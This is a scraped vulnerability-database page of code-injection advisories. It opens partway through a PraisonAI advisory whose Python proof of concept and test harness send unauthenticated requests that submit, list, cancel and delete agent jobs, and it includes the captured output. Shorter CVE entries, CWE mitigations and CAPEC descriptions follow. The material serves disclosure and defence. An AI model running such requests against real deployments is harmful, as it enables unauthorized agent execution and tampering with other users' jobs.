f\"http://127.0.0.1:{PORT}{path}\"\n    data = None\n    if body is not None:\n        data = json.dumps(body).encode(\"utf-8\")\n    req = Request(url, data=data, method=method, headers=headers or {})\n    if data is not None:\n        req.add_header(\"Content-Type\", \"application/json\")\n    try:\n        with urlopen(req, timeout=timeout) as resp:\n            return resp.status, dict(resp.headers), resp.read().decode(\"utf-8\", errors=\"replace\")\n    except HTTPError as e:\n        return e.code, dict(e.headers), e.read().decode(\"utf-8\", errors=\"replace\")\n    except URLError as e:\n        return None, {}, f\"URLError: {e}\"\n\ndef run_server(app):\n    config = uvicorn.Config(app, host=\"127.0.0.1\", port=PORT, log_level=\"warning\")\n    server = uvicorn.Server(config)\n    import asyncio\n    loop = asyncio.new_event_loop()\n    asyncio.set_event_loop(loop)\n    loop.run_until_complete(server.serve())\n\ndef main() -\u003e int:\n    print(\"=\" * 70)\n    print(\"praisonai version: 4.6.48\")\n    print(\"Test: spin up praisonai.jobs.server in-process, send\")\n    print(\"      UNAUTHENTICATED requests to every /api/v1/runs route.\")\n    print(\"=\" * 70)\n\n    app = create_app()\n    t = threading.Thread(target=run_server, args=(app,), daemon=True)\n    t.start()\n    time.sleep(1.5)\n\n    findings = []\n\n    # 1. POST /api/v1/runs \u2014 submit a new job WITHOUT auth.\n    payload = {\n        \"prompt\": \"ATTACKER-CONTROLLED PROMPT \u2014 would invoke an agent\",\n        \"framework\": \"praisonai\",\n        \"config\": {\"_attacker_says\": \"no auth required\"},\n        \"timeout\": 5,\n    }\n    code, hdrs, body = http_request(\"POST\", \"/api/v1/runs\", body=payload)\n    print(f\"\\n[1] POST /api/v1/runs (no Authorization) -\u003e HTTP {code}\")\n    print(f\"    body: {body[:300]}\")\n    job_id = None\n    if code == 202:\n        try:\n            job_id = json.loads(body).get(\"job_id\")\n            findings.append(f\"POST /api/v1/runs: 202 Accepted, job_id={job_id!r}\")\n        except Exception:\n            pass\n\n    # 2. GET /api/v1/runs \u2014 list ALL jobs system-wide.\n    code, _, body = http_request(\"GET\", \"/api/v1/runs?page=1\u0026page_size=20\")\n    print(f\"\\n[2] GET /api/v1/runs (no Authorization) -\u003e HTTP {code}\")\n    if code == 200:\n        findings.append(\"GET /api/v1/runs: unauthenticated list of ALL jobs\")\n\n    if job_id:\n        code, _, body = http_request(\"GET\", f\"/api/v1/runs/{job_id}\")\n        print(f\"\\n[3] GET /api/v1/runs/{{job_id}} -\u003e HTTP {code}\")\n        code, _, body = http_request(\"POST\", f\"/api/v1/runs/{job_id}/cancel\")\n        print(f\"\\n[4] POST /api/v1/runs/{{job_id}}/cancel -\u003e HTTP {code}\")\n        code, _, body = http_request(\"DELETE\", f\"/api/v1/runs/{job_id}\")\n        print(f\"\\n[5] DELETE /api/v1/runs/{{job_id}} -\u003e HTTP {code}\")\n\n    print(\"\\n\" + \"=\" * 70)\n    if any(\u0027POST /api/v1/runs:\u0027 in f for f in findings):\n        print(f\"VULNERABLE: {len(findings)} unauthenticated routes confirmed\")\n        for f in findings:\n            print(f\"  - {f}\")\n        print(\"VERDICT: VULNERABLE\")\n        return 0\n    print(\"DEFENDED\")\n    return 1\n\nif __name__ == \"__main__\":\n    sys.exit(main())\n```\n\n## Verification harness (executed against the cloned repo)\n\nThis drives the unmodified upstream code rather than a reproduction.\n\n```python\nimport sys, types, os\nBK=os.path.abspath(\"repos/PraisonAI/src/praisonai\"); sys.path.insert(0,BK)\nfor p in [\"praisonai\",\"praisonai.jobs\"]:\n    m=types.ModuleType(p); m.__path__=[BK+\"/\"+p.replace(\".\",\"/\")]; sys.modules[p]=m\nimport praisonai.jobs.server as S          # REAL jobs server\napp = S.create_app()                      # REAL FastAPI app\nfrom starlette.testclient import TestClient\nclient = TestClient(app)\nP=\"/api/v1/runs\"\ntests=[(\"GET  list\",   lambda: client.get(P)),\n       (\"POST submit\", lambda: client.post(P, json={\"agents_config\":{\"a\":\"x\"},\"input\":\"hi\"})),\n       (\"GET  status\", lambda: client.get(P+\"/nope\")),\n       (\"GET  result\", lambda: client.get(P+\"/nope/result\")),\n       (\"POST cancel\", lambda: client.post(P+\"/nope/cancel\")),\n       (\"DEL  delete\", lambda: client.delete(P+\"/nope\"))]\ncodes=[]\nfor name,fn in tests:\n    c=fn().status_code; codes.append(c); print(f\"[+] (no auth) {name:12s} {P} -\u003e HTTP {c}\")\nassert all(c not in (401,403) for c in codes), codes\nassert codes[0]==200    # list works unauthenticated\nprint(\"[+] CONFIRMED against real praisonai jobs API: list returns 200 and NO endpoint returns 401/403 \u2014 fully unauthenticated agent-execution API\")\n```\n\n## Verified result\n\nThis PoC was executed against the live upstream code; captured output:\n\n```\n[+] (no auth) GET  list    /api/v1/runs -\u003e HTTP 200\n[+] (no auth) POST submit  /api/v1/runs -\u003e HTTP 422\n[+] (no auth) GET  status  /api/v1/runs -\u003e HTTP 404\n[+] (no auth) GET  result  /api/v1/runs -\u003e HTTP 404\n[+] (no auth) POST cancel  /api/v1/runs -\u003e HTTP 404\n[+] (no auth) DEL  delete  /api/v1/runs -\u003e HTTP 404\n[+] CONFIRMED against real praisonai jobs API: list returns 200 and NO endpoint returns 401/403 \u2014 fully unauthenticated agent-execution API\n```\n\n## Credit\n\nKai Aizen \u2014 SnailSploit (@SnailSploit). Adversarial \u0026 Offensive Security Research.",
  "id": "GHSA-fq2m-6wqh-x44g",
  "modified": "2026-06-18T13:57:16Z",
  "published": "2026-06-18T13:57:16Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-fq2m-6wqh-x44g"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/MervinPraison/PraisonAI"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PraisonAI: Jobs API exposes agent-execution endpoints with no authentication "
}

GHSA-FQ34-VCP4-H3RH

Vulnerability from github – Published: 2022-05-01 07:25 – Updated: 2025-04-09 03:31
VLAI
Details

PHP remote file inclusion vulnerability in includes/functions_static_topics.php in the Nivisec Static Topics module for phpBB 1.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2006-5191"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2006-10-10T04:06:00Z",
    "severity": "MODERATE"
  },
  "details": "PHP remote file inclusion vulnerability in includes/functions_static_topics.php in the Nivisec Static Topics module for phpBB 1.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter.",
  "id": "GHSA-fq34-vcp4-h3rh",
  "modified": "2025-04-09T03:31:59Z",
  "published": "2022-05-01T07:25:55Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2006-5191"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/29347"
    },
    {
      "type": "WEB",
      "url": "https://www.exploit-db.com/exploits/2477"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/22269"
    },
    {
      "type": "WEB",
      "url": "http://www.nivisec.com/article.php?l=vi\u0026ar=20"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/29506"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/20353"
    },
    {
      "type": "WEB",
      "url": "http://www.vupen.com/english/advisories/2006/3916"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-FQ38-X2CV-8JX3

Vulnerability from github – Published: 2022-05-01 07:00 – Updated: 2022-05-01 07:00
VLAI
Details

PHP remote file inclusion vulnerability in manager/frontinc/prepend.php for Plume 1.0.3 allows remote attackers to execute arbitrary code via a URL in the _PX_config[manager_path] parameter. NOTE: this is a different executable and affected version than CVE-2006-0725.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2006-2645"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2006-05-30T10:02:00Z",
    "severity": "HIGH"
  },
  "details": "PHP remote file inclusion vulnerability in manager/frontinc/prepend.php for Plume 1.0.3 allows remote attackers to execute arbitrary code via a URL in the _PX_config[manager_path] parameter.  NOTE: this is a different executable and affected version than CVE-2006-0725.",
  "id": "GHSA-fq38-x2cv-8jx3",
  "modified": "2022-05-01T07:00:58Z",
  "published": "2022-05-01T07:00:58Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2006-2645"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/24697"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27699"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/20310"
    },
    {
      "type": "WEB",
      "url": "http://securityreason.com/securityalert/975"
    },
    {
      "type": "WEB",
      "url": "http://securitytracker.com/id?1016165"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/archive/1/435130/100/0/threaded"
    },
    {
      "type": "WEB",
      "url": "http://www.vupen.com/english/advisories/2006/2014"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-FQ4G-P58Q-8F6G

Vulnerability from github – Published: 2022-05-01 06:43 – Updated: 2022-05-01 06:43
VLAI
Details

Eval injection vulnerability in sessions.inc in PHP Base Library (PHPLib) before 7.4a, when index.php3 from the PHPLib distribution is available on the server, allows remote attackers to execute arbitrary PHP code by including a base64-encoded representation of the code in a cookie. NOTE: this description was significantly updated on 20060605 to reflect new details after an initial vague advisory.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2006-0887"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2006-02-25T11:02:00Z",
    "severity": "HIGH"
  },
  "details": "Eval injection vulnerability in sessions.inc in PHP Base Library (PHPLib) before 7.4a, when index.php3 from the PHPLib distribution is available on the server, allows remote attackers to execute arbitrary PHP code by including a base64-encoded representation of the code in a cookie.  NOTE: this description was significantly updated on 20060605 to reflect new details after an initial vague advisory.",
  "id": "GHSA-fq4g-p58q-8f6g",
  "modified": "2022-05-01T06:43:25Z",
  "published": "2022-05-01T06:43:25Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2006-0887"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/24873"
    },
    {
      "type": "WEB",
      "url": "http://secunia.com/advisories/16902"
    },
    {
      "type": "WEB",
      "url": "http://securitytracker.com/id?1016123"
    },
    {
      "type": "WEB",
      "url": "http://sourceforge.net/project/shownotes.php?group_id=31885\u0026release_id=396091"
    },
    {
      "type": "WEB",
      "url": "http://www.gulftech.org/?node=research\u0026article_id=00107-03052006"
    },
    {
      "type": "WEB",
      "url": "http://www.osvdb.org/23466"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/16801"
    },
    {
      "type": "WEB",
      "url": "http://www.vupen.com/english/advisories/2006/0720"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-FQ4Q-M37Q-RFRH

Vulnerability from github – Published: 2025-02-20 18:31 – Updated: 2025-11-04 21:31
VLAI
Details

PHPJabbers Cleaning Business Software v1.0 is vulnerable to CSV Injection vulnerability which allows an attacker to execute remote code. The vulnerability exists due to insufficient input validation on Languages section Labels any parameters field in System Options that is used to construct CSV file.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-51331"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-02-20T16:15:35Z",
    "severity": "MODERATE"
  },
  "details": "PHPJabbers Cleaning Business Software v1.0 is vulnerable to CSV Injection vulnerability which allows an attacker to execute remote code. The vulnerability exists due to insufficient input validation on Languages section Labels any parameters field in System Options that is used to construct CSV file.",
  "id": "GHSA-fq4q-m37q-rfrh",
  "modified": "2025-11-04T21:31:30Z",
  "published": "2025-02-20T18:31:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51331"
    },
    {
      "type": "WEB",
      "url": "https://packetstorm.news/files/id/176509"
    },
    {
      "type": "WEB",
      "url": "https://www.phpjabbers.com/cleaning-business-software/#sectionDemo"
    },
    {
      "type": "WEB",
      "url": "http://packetstormsecurity.com/files/176509/PHPJabbers-Cleaning-Business-Software-1.0-CSV-Injection.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-FQ64-FVH6-9C68

Vulnerability from github – Published: 2021-12-16 00:02 – Updated: 2022-07-13 00:01
VLAI
Details

Web Media Extensions Remote Code Execution Vulnerability

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-43214"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-12-15T15:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "Web Media Extensions Remote Code Execution Vulnerability",
  "id": "GHSA-fq64-fvh6-9c68",
  "modified": "2022-07-13T00:01:43Z",
  "published": "2021-12-16T00:02:03Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-43214"
    },
    {
      "type": "WEB",
      "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43214"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-FQ6X-64VF-73Q4

Vulnerability from github – Published: 2025-01-22 00:33 – Updated: 2025-01-22 18:31
VLAI
Details

In gatts_process_find_info of gatt_sr.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-43770"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-787",
      "CWE-94"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-01-21T23:15:13Z",
    "severity": "HIGH"
  },
  "details": "In gatts_process_find_info of gatt_sr.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote (proximal/adjacent) code execution with no additional execution privileges needed. User interaction is not needed for exploitation.",
  "id": "GHSA-fq6x-64vf-73q4",
  "modified": "2025-01-22T18:31:55Z",
  "published": "2025-01-22T00:33:37Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43770"
    },
    {
      "type": "WEB",
      "url": "https://source.android.com/security/bulletin/2025-01-01"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design

Strategy: Refactoring

Refactor your program so that you do not have to dynamically generate code.

Mitigation
Architecture and Design
  • Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product.
  • Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection.
  • This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.
  • Be careful to avoid CWE-243 and other weaknesses related to jails.
Mitigation MIT-5
Implementation

Strategy: Input Validation

  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
  • To reduce the likelihood of code injection, use stringent allowlists that limit which constructs are allowed. If you are dynamically constructing code that invokes a function, then verifying that the input is alphanumeric might be insufficient. An attacker might still be able to reference a dangerous function that you did not intend to allow, such as system(), exec(), or exit().
Mitigation
Testing

Use dynamic tools and techniques that interact with the product using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The product's operation may slow down, but it should not become unstable, crash, or generate incorrect results.

Mitigation MIT-32
Operation

Strategy: Compilation or Build Hardening

Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).

Mitigation MIT-32
Operation

Strategy: Environment Hardening

Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).

Mitigation
Implementation

For Python programs, it is frequently encouraged to use the ast.literal_eval() function instead of eval, since it is intentionally designed to avoid executing code. However, an adversary could still cause excessive memory or stack consumption via deeply nested structures [REF-1372], so the python documentation discourages use of ast.literal_eval() on untrusted data [REF-1373].

CAPEC-242: Code Injection

An adversary exploits a weakness in input validation on the target to inject new code into that which is currently executing. This differs from code inclusion in that code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.

CAPEC-35: Leverage Executable Code in Non-Executable Files

An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.

CAPEC-77: Manipulating User-Controlled Variables

This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.